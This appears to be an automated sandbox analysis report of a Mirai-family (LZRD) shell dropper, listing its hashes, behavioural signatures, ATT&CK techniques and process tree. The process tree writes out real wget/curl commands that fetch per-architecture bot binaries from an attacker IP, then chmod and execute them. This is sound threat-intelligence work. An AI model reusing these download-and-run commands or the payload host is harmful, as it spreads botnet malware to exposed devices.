Analysis
-
max time kernel
123s -
max time network
151s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
-
submitted
15-01-2025 06:55
General
-
Target
sensi.sh
-
Size
1KB
-
MD5
b56a0716f8b4b73b0e35ebd7b66c03fa
-
SHA1
d9711b6f58091fd794bf341dd7237136436a4a74
-
SHA256
81bceab3472a818b061caa7d8d0bab3171bed77a3b5b86ceffae3fd2d16be12b
-
SHA512
8bf2d0b7cd72d77fa84ab03edc5ac7e217bd122ffabbe370d3f5a10333e22ea44ab0c151c2b76dd9f819341b0eb0f48acce2b0c2b7391bc8a19e44df0c6e23aa
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
-
Mirai family
-
Contacts a large (15615) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 10 IoCs
-
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Reads runtime system information 42 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 21 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/sensi.sh/tmp/sensi.sh1⤵
- Writes file to tmp directory
-
/bin/cpcp /bin/busybox /tmp/2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/usr/bin/wgetwget http://45.13.151.59/d/xd.x862⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://45.13.151.59/d/xd.x862⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat xd.x862⤵
-
-
/bin/chmodchmod +x busybox sensi.sh SSH systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-DJ9mfo xd.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/SSH./SSH2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://45.13.151.59/d/xd.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://45.13.151.59/d/xd.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/catcat xd.mips2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod +x busybox sensi.sh SSH systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-DJ9mfo xd.mips xd.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/SSH./SSH2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://45.13.151.59/d/xd.mpsl2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://45.13.151.59/d/xd.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat xd.mpsl2⤵
-
-
/bin/chmodchmod +x busybox sensi.sh SSH systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-DJ9mfo xd.mips xd.mpsl xd.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/SSH./SSH2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
-
-
/usr/bin/wgetwget http://45.13.151.59/d/xd.arm42⤵
-
-
/usr/bin/curlcurl -O http://45.13.151.59/d/xd.arm42⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat xd.arm42⤵
-
-
/bin/chmodchmod +x busybox sensi.sh SSH systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-DJ9mfo xd.arm4 xd.mips xd.mpsl xd.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/SSH./SSH2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://45.13.151.59/d/xd.arm52⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://45.13.151.59/d/xd.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat xd.arm52⤵
-
-
/bin/chmodchmod +x busybox sensi.sh SSH systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-DJ9mfo xd.arm4 xd.arm5 xd.mips xd.mpsl xd.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/SSH./SSH2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://45.13.151.59/d/xd.arm62⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://45.13.151.59/d/xd.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat xd.arm62⤵
-
-
/bin/chmodchmod +x busybox sensi.sh SSH systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-DJ9mfo xd.arm4 xd.arm5 xd.arm6 xd.mips xd.mpsl xd.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/SSH./SSH2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://45.13.151.59/d/xd.arm72⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://45.13.151.59/d/xd.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat xd.arm72⤵
-
-
/bin/chmodchmod +x busybox sensi.sh SSH systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-DJ9mfo xd.arm4 xd.arm5 xd.arm6 xd.arm7 xd.mips xd.mpsl xd.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/SSH./SSH2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://45.13.151.59/d/xd.ppc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://45.13.151.59/d/xd.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat xd.ppc2⤵
-
-
/bin/chmodchmod +x busybox sensi.sh SSH systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-DJ9mfo xd.arm4 xd.arm5 xd.arm6 xd.arm7 xd.mips xd.mpsl xd.ppc xd.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/SSH./SSH2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://45.13.151.59/d/xd.m68k2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://45.13.151.59/d/xd.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat xd.m68k2⤵
-
-
/bin/chmodchmod +x busybox sensi.sh SSH systemd-private-4b7bf3fb6b0c4916a03b3059ddb1b3dc-systemd-timedated.service-DJ9mfo xd.arm4 xd.arm5 xd.arm6 xd.arm7 xd.m68k xd.mips xd.mpsl xd.ppc xd.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/SSH./SSH2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://45.13.151.59/d/xd.sh42⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://45.13.151.59/d/xd.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat xd.sh42⤵
-
-
/bin/chmodchmod +x busybox sensi.sh SSH xd.arm4 xd.arm5 xd.arm6 xd.arm7 xd.m68k xd.mips xd.mpsl xd.ppc xd.sh4 xd.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/SSH./SSH2⤵
- Executes dropped EXE
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
30KB
MD59eb3c4ba27a4fc327989972849b38ec5
SHA19c548f624b37f3526dd7852b604bdbf30f62a818
SHA256a964b7ee00bf9c8c260d94a396558f91087e0cc108574abc9d859178be992001
SHA512f811a849cd3fda6f106afd4eb15a39adad7c4d34087311e93e446a90aa4e616a7b7a034fd13ddf6eb1681ad5dbdb10643a97dedbf6167125227524ac9497ed76
-
Filesize
31KB
MD525fd2c6601a15a434f1c292b7c4b1276
SHA154dfaa46b67dc80ccc9a9eec6a7f9e689277097f
SHA256cd2e4527cedd13f92655f0ba0ef81ef8c096b9fe95b292bfa958ef58b59c0d8f
SHA5121e046a98791ae2f5af7bcac041c30f422c221dde9d254f91d1bf67858234c4b6d81328c25ee642702c4a85b698cace7d2b6c338fcce1b41cfdf7f2087792d1a5
-
Filesize
196B
MD562962daa1b19bbcc2db10b7bfd531ea6
SHA1d64bae91091eda6a7532ebec06aa70893b79e1f8
SHA25680c3fe2ae1062abf56456f52518bd670f9ec3917b7f85e152b347ac6b6faf880
SHA5129002a0475fdb38541e78048709006926655c726e93e823b84e2dbf5b53fd539a5342e7266447d23db0e5528e27a19961b115b180c94f2272ff124c7e5c8304e7
-
Filesize
25KB
MD51eef15ca6184628b54671389f25d9074
SHA17e4c479458507f94e58cf1948dd55edf9c7955f6
SHA256345d632c1f9def9685aaa29c9cf12a71c8d09f1126ec587cd18755ef26d3d941
SHA5124bd484a4e688638357d5301a66f56bc4f4a269beeae49f44b7abf83186b332b536e2806077a14200f9b4d12bc09f4f6e12a9f23b5bcb905ccc4924eb473e165b
-
Filesize
62KB
MD52be35a4be977b729f473abed043e2016
SHA1843f1cc5bf80672fdccf966eb3157ed82edad35c
SHA256379780768184200e4533d0b62e1886a95902db29010acc12ab85d43fd33bec71
SHA5124d2e50aa8bb237a158d08bf845256c5f417746a1846c41cb05d0abdc71e6d491ac23b52d042ef61de25788d6af6afed88b893313b83feae3f8bb82a7df9afc2d
-
Filesize
857KB
MD56ffc46165b5d9726a6607f3ea5305589
SHA1ab127220f42e816b413dde0d17031e251a7bc98f
SHA25680d636e2f1237e9adc9ea0bf7f42b17d7df8781db0684c33696411e50588a38c
SHA512456fcd5d5bda524ef5236e00695a891cfefe15364f9c7a4ff04ad7dfdc7fd1726f037e905622216f13aee6c2d4ee90be0c850de82b3aac1d02a643db9f935af8
-
Filesize
29KB
MD5cb02e84a85813c662f7191cc1d19685f
SHA159ad600226c432b1b8c3a077be7a6c280c2da1a1
SHA2563aff058d7b58eb91ccde83818aae5dd597aae06d96ab89c080c0a3d88f877f31
SHA512ea9bea2cb21045791f611089d04714ef109dfc77d462763811bd4ce0dfeae93e7b6bd26637ccfc32e840504de17bf7da45ec29f0639f724de77ea985226e2f82